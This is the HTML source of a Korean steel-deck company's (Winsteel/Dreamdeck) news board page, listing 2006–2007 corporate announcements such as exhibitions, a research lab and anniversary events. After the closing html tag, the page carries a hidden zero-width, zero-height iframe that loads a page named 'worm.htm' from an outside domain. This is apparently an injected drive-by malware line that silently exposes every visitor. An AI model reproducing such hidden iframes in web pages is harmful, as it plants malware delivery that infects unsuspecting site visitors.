
<html>
<head>
<title>드림데크 :: 최선을 다해 최상을 만드는 기업, Winsteel</title>
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr">
<script language="javascript" src="/inc/InsertFlash.js"></script>
<script language="JavaScript">
<!--

function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>

<script language="JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);

function MM_showHideLayers() { //v3.0
  var i,p,v,obj,args=MM_showHideLayers.arguments;
  for (i=0; i<(args.length-2); i+=3) if ((obj=MM_findObj(args[i]))!=null) { v=args[i+2];
    if (obj.style) { obj=obj.style; v=(v=='show')?'visible':(v='hide')?'hidden':v; }
    obj.visibility=v; }
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>

<!-- 관리자 삭제 체크 액션 소스 -->
<script language=javascript> 
<!--
    function check_onclick() { 
        var val = frm.chkall.checked; 
        if (frm.chk.length) { 
            for (var i=0;i<frm.chk.length;i++) { 
                frm.chk[i].checked = val;         
            } 
        } else { 
            frm.chk.checked = val;         
        } 
    } 

    function check_slt() { 
        var cnt = 0; 
        if (frm.chk.length) { 
            for (var i=0;i<frm.chk.length;i++) { 
                if (frm.chk[i].checked) cnt++; 
            }         
        } else { 
            if (frm.chk.checked) cnt++; 
        } 
        if (cnt == 0) { 
            alert("항목을 선택하세요!"); 
            return false; 
        } else { 
            return true; 
        } 
    } 
//-->
</script> 

<LINK href="/inc/text.css" type="text/css" rel="stylesheet">
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" valign=top>
<table width="100%" border="0" cellspacing="0" cellpadding="0" valign=top>
<tr>
  <td>
<html>
<head>
<title>윈스틸 사원 로그인</title>
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr">
<script language="javascript" src="/inc/InsertFlash.js"></script>
<script language="JavaScript">
	function openNewWindow(window){
		open(window,"NewWindow","left=200,top=200,toobar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=yes,width=300,height=150");
	}
</script>

</head>

<body>
  <table width="100%" border="0" cellspacing="0" cellpadding="0" valign=top background="/images/menu_bg.gif">
    <tr>
      <td valign=top>
	<table width="970" border="0" cellspacing="0" cellpadding="0" valign=top>
          <tr>
	      <td><img src="/images/top_white.gif"></td>
	      <td><a href="/index.asp"><img src="/images/top_home.gif" border=0></a></td>
	      
	      <td><a href=javascript:openNewWindow("/login.asp")><img src="/images/top_login.gif" border=0></a></td>
	      
	      <td><A href="mailto:webmaster@dreamdeck.co.kr"><img src="/images/top_contactus.gif" border=0></a></td>
	      <td><a href="/sitemap.asp"><img src="/images/top_sitemap.gif" border=0></a></td>
	    </tr>
	  </table>
	  <table width="970" border="0" cellspacing="0" cellpadding="0" valign=top>
            <tr>
	      <td valign=top>
		  <script>FlashInsert('main', '/images/logo.swf', '128', '48', 'always', 'opaque', '#ffffff', 'high', 'middle');</script>
		  <!-- <embed src="/images/logo.swf" width="128" height="48" border=0> </embed> -->
		  </td>
	          
		  <td>
		  <script>FlashInsert('main', '/images/menu.swf', '842', '65', 'always', 'opaque', '#ffffff', 'high', 'middle');</script>
		  <!-- <embed src="/images/menu.swf" width="842" height="65"></embed> -->
		  </td>
	          	          
	    </tr>
	  </table>
      </td>
    </tr>
  </table>
 </body>
  <table width="970" border="0" cellspacing="0" cellpadding="0" valign=top>
    <tr>
	  <td valign=top style="padding-left:20;padding-top:10;">
	  <table border="0" cellspacing="0" cellpadding="0" valign=top>
	    <tr>
	      <td>
		  <script>FlashInsert('main', '/images/left_customer_menu.swf', '222', '293', 'always', 'transparent', '#ffffff', 'high', 'middle');</script>
		  <!-- <embed src="/images/left_customer_menu.swf" width="222" height="293"></embed> --></td>
	    </tr>
	    <tr>
	      <td valign=top><img src="/images/gogek_image.jpg"></td>
	    </tr>
      </table>
	  </td>
	  <td style="padding-left:20;padding-top:10;" valign="top">
	  <table border="0" width=700 cellspacing="0" cellpadding="0" valign=top>
	  <tr>
	    <td><img src="/images/title_news.gif"></td>
		<td align=right style="padding-right:10;"><font color=#999999>HOME>고객센터></font><font color=#444444>뉴스</font></td>
	  </tr>
	  <tr>
	    <td colspan=2><img src="/images/title_customer_line.gif"></td>
	  </tr>
	  <tr>
	    <td colspan="2" style="padding-top:10;">
<!------------------------------게시판들어갈 자리---------------------------------------------------->

		<table width="95%" border="0" cellpadding="0" cellspacing="0"> 
			<tr>
			    <!-- 카테고리별로 검색하는 부분 -->
				<form method="post" name="category" id="category">
				    <td width="60" align="right" valign="top" bgcolor="#F6F6F6" style="padding-top:2;padding-bottom:2;"><img src="images/board_catebox_txt.gif" width="28" height="12" hspace="8" vspace="1"></td>
				    <td colspan="5" bgcolor="#F6F6F6" style="padding-top:2;padding-bottom:2;">
						<a href="p_list.asp"><b>전체</b></a>&nbsp;
						
						<a href="p_list.asp?category=2">|&nbsp;문의&nbsp;
						
					</td>
				</form>
				<!-- 카테고리별로 검색하는 부분 종료 -->
			</tr>
			<tr> 
			    <td colspan="5" height="2" bgcolor="FFFFFF""></td>
			</tr>
			<tr> 
				<td align="center" width="7%" height="25" background="images/b_t_bg.gif"><img src="images/b_t_1.gif"></td>
			    <td align="center" width="48%" background="images/b_t_bg.gif"><img src="images/b_t_2.gif"></td>
			    <td align="center" width="15%" background="images/b_t_bg.gif"><img src="images/b_t_3.gif"></td>
			    <td align="center" width="15%" background="images/b_t_bg.gif"><img src="images/b_t_5.gif"></td>
			    <td align="center" width="7%" background="images/b_t_bg.gif"><img src="images/b_t_6.gif"></td>
			</tr>
			<tr> 
			    <td colspan="5" height="1" bgcolor="D4D4D4""></td>
			</tr>
			

					<!-- 답글일 경우 리스트 --> 

					 
						<tr  height="35" bgcolor="white"> 
							<td align="center" width="7%">11</td>
						    <td width="53%" valign="center"> 
							    <a href = "p_view.asp?msg_id=84&page=1&intsubj=&intcont=&intauth=&searchstring=">&nbsp;'TOX DECK PLATE' 전시회(대한건축사 협회-2 ...</a><FONT SIZE="1" COLOR="#6600FF">[0]</FONT> </td>
						    <td align="center" width="15%">윈스틸</td>
						    <td align="center" width="15%">2007-02-26</td>
						    <td align="center" width="7%">285</td>
						</tr>
					 
						<tr> 
							<td BGCOLOR="CCCCCC" height="1" width="" colspan="5"></td>
						</tr>
				

					<!-- 답글일 경우 리스트 --> 

					 
						<tr  height="35" bgcolor="white"> 
							<td align="center" width="7%">10</td>
						    <td width="53%" valign="center"> 
							    <a href = "p_view.asp?msg_id=83&page=1&intsubj=&intcont=&intauth=&searchstring=">&nbsp;철근콘크리트바닥 누수 걱정마세요(2007/1/15-매일경 ...</a><FONT SIZE="1" COLOR="#6600FF">[0]</FONT><img src="images/board_image.gif" border="0" width="11" height="10" alt="첨부이미지있음" align="absmiddle"> </td>
						    <td align="center" width="15%">윈스틸</td>
						    <td align="center" width="15%">2007-01-15</td>
						    <td align="center" width="7%">1363</td>
						</tr>
					 
						<tr> 
							<td BGCOLOR="CCCCCC" height="1" width="" colspan="5"></td>
						</tr>
				

					<!-- 답글일 경우 리스트 --> 

					 
						<tr  height="35" bgcolor="white"> 
							<td align="center" width="7%">9</td>
						    <td width="53%" valign="center"> 
							    <a href = "p_view.asp?msg_id=82&page=1&intsubj=&intcont=&intauth=&searchstring=">&nbsp;(주)윈스틸 기업부설 기술연구소 연구활동 집중화 </a><FONT SIZE="1" COLOR="#6600FF">[0]</FONT><img src="images/board_image.gif" border="0" width="11" height="10" alt="첨부이미지있음" align="absmiddle"> </td>
						    <td align="center" width="15%">윈스틸</td>
						    <td align="center" width="15%">2006-10-27</td>
						    <td align="center" width="7%">2087</td>
						</tr>
					 
						<tr> 
							<td BGCOLOR="CCCCCC" height="1" width="" colspan="5"></td>
						</tr>
				

					<!-- 답글일 경우 리스트 --> 

					 
						<tr  height="35" bgcolor="white"> 
							<td align="center" width="7%">8</td>
						    <td width="53%" valign="center"> 
							    <a href = "p_view.asp?msg_id=81&page=1&intsubj=&intcont=&intauth=&searchstring=">&nbsp;창사 30주년 기념 행사 및 장기근속, 모범사원 포상 </a><FONT SIZE="1" COLOR="#6600FF">[0]</FONT> </td>
						    <td align="center" width="15%">윈스틸</td>
						    <td align="center" width="15%">2006-09-22</td>
						    <td align="center" width="7%">2152</td>
						</tr>
					 
						<tr> 
							<td BGCOLOR="CCCCCC" height="1" width="" colspan="5"></td>
						</tr>
				

					<!-- 답글일 경우 리스트 --> 

					 
						<tr  height="35" bgcolor="white"> 
							<td align="center" width="7%">7</td>
						    <td width="53%" valign="center"> 
							    <a href = "p_view.asp?msg_id=80&page=1&intsubj=&intcont=&intauth=&searchstring=">&nbsp;창사 30주년 기념 음성공장 한마음 체육대회 개최 </a><FONT SIZE="1" COLOR="#6600FF">[0]</FONT> </td>
						    <td align="center" width="15%">윈스틸</td>
						    <td align="center" width="15%">2006-09-22</td>
						    <td align="center" width="7%">1539</td>
						</tr>
					 
						<tr> 
							<td BGCOLOR="CCCCCC" height="1" width="" colspan="5"></td>
						</tr>
				

					<!-- 답글일 경우 리스트 --> 

					 
						<tr  height="35" bgcolor="white"> 
							<td align="center" width="7%">6</td>
						    <td width="53%" valign="center"> 
							    <a href = "p_view.asp?msg_id=79&page=1&intsubj=&intcont=&intauth=&searchstring=">&nbsp;당사 충북 음성군에 수재의연품 전달 </a><FONT SIZE="1" COLOR="#6600FF">[0]</FONT> </td>
						    <td align="center" width="15%">윈스틸</td>
						    <td align="center" width="15%">2006-09-22</td>
						    <td align="center" width="7%">1394</td>
						</tr>
					 
						<tr> 
							<td BGCOLOR="CCCCCC" height="1" width="" colspan="5"></td>
						</tr>
				

					<!-- 답글일 경우 리스트 --> 

					 
						<tr  height="35" bgcolor="white"> 
							<td align="center" width="7%">5</td>
						    <td width="53%" valign="center"> 
							    <a href = "p_view.asp?msg_id=78&page=1&intsubj=&intcont=&intauth=&searchstring=">&nbsp;기업부설 기술 연구소 설립 인정 </a><FONT SIZE="1" COLOR="#6600FF">[0]</FONT> </td>
						    <td align="center" width="15%">윈스틸</td>
						    <td align="center" width="15%">2006-09-21</td>
						    <td align="center" width="7%">803</td>
						</tr>
					 
						<tr> 
							<td BGCOLOR="CCCCCC" height="1" width="" colspan="5"></td>
						</tr>
				 
			</table>

			<table width="95%" cellpadding="0" cellspacing="0">
			  <tr> 
			    <td height="1" bgcolor="D4D4D4"></td>
			  </tr>
			</table>

			<table width="670" height="20" style="font-family:굴림; font-size:9pt;" cellpadding="5" cellspacing="0">
			<!-- 페이징처리 -->
				<tr>
					<td width="100" align="left"></td> 
					<td align="center" valign="middle" width="450" height="20" width="">
					1&nbsp;&nbsp;<a href="p_list.asp?page=2&subj=&cont=&auth=&searchstring=&category=2">2</a>&nbsp;&nbsp; 
				    	
					</td>
					<td align="right"></td>
				</tr>
			</table>

			<!-- 검색처리 부분 -->
			<table width="670" height="43" cellpadding="5" cellspacing="0" background="images/search_back.gif">
				<tr>
					<td align="center" style="padding-top:5">
						<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
							<form name = "search" method = "post" action = "p_list.asp" onSubmit="return searchtext();">
							<tr>
								<td width="100"><img src="images/board_search_topbox_title.gif"></td>
								<td width="60"><input type = "checkbox" name = "subj" style="border=0" value = "1" >제 목</td> 
								<td width="60"><input type = "checkbox" name = "cont" style="border=0" value = "2" >내 용</td> 
								<td width="70"><input type = "checkbox" name = "auth" style="border=0" value = "4" >글쓴이</td>
								<td width="150"><input type = "text" name = "searchstring" size = "20" maxlength = "30" value = "" style="font-family:굴림; font-size:9pt;"></td>
								<td width="50"><input type="image" src="images/board_search_btn.gif" alt="검색" style="border=0" align="absmiddle"></td>
							</form>
							</tr>
						</table>
					</td>
				</tr>
			</table>
			<!-- 검색처리 부분 -->
	
<!-- 메인 종료 -->



<!-- 관리자 모드 함수 -->



<!-- 비관리자 모드 함수 -->

<!------------------------------사진게시판들어갈 자리---------------------------------------------------->
</td>
	  </tr>
	  </table>
	  </td>
	</tr>
  </table>
  <table border="0" cellspacing="0" cellpadding="0" valign=top background="/images/copyright.gif" width="944" height="66">
    <tr>
	  <td style="padding-left:780;padding-top:25;">
	  <select size="1" onchange="namosw_goto_byselect(this, 'blank')"
      style="font-family:돋움; font-size:11; color:9AA5B1; background-color:white;">
      <option selected>--FAMILY SITE--</option>
      <option style="background-color:ECF5FF" value="http://www.winsteel.co.kr">winsteel.co.kr</option>
      <option style="background-color:ECF5FF" value="http://www.royalkingdom.co.kr/">로얄킹덤호텔</option>
      </select>
      </td>
	</tr>
  </table>

</body>
</html>
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>
